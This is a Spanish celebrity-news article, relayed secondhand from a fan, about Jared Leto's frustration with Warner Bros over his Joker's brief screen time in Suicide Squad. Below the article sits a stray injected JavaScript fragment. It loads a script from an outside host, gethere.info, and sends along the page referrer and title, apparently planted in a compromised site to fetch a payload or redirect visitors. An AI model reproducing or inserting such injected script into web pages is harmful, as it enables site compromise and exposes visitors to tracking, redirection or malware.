Jared Leto a Warner Bros: “Que se jodan”

Después de volverse medio loco para interpretar al Joker, de teñirse el pelo y pintarse la cara, de llevar una dentadura de oro, después de hacer pesadas bromas casi todo el equipo de rodaje de Escuadrón Suicida, de regalar ratas, cabezas de cerdo o preservativos usados a sus compañeros. Después de todo Jared Leto ha visto como su macabra creación apenas tiene poco más de 8 minutos en Escuadrón Suicida. El actor no ocultó su molestia y no es para menos.

Durante una reunión con los fans de su banda Thirty Seconds to Mars @30SECONDSTOMARS, el actor ganador de un oscar ha dejado claro que no está nada satisfecho con el trato que le han dado a su villano. Aunque no tenemos las declaraciones del actor, ComicBookMovie ha recogido las palabras de uno de los fans que estuvieron allí y que resumen perfectamente el malestar de Leto:

Fue muy honesto acerca de la película. Siente una especie de engaño por haber formado parte de algo que se le había vendido a él de manera muy diferente. Leto pensaba que estaba trabajando en algo mucho más artístico de lo que al final resultó ser. El actor dijo sentirse abrumado por el odio en relación con el aspecto de la película y sus opciones.

Además Leto declaró que con debido a su contrato con Warner Bros para varias películas como el Joker, no puede participar en algunos de sus pasatiempos favoritos como la escalada. El actor, muy frustrado, acabo por resumir su estado en un escueto y sincero: “Que se jodan”.

 

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|||
Comentarios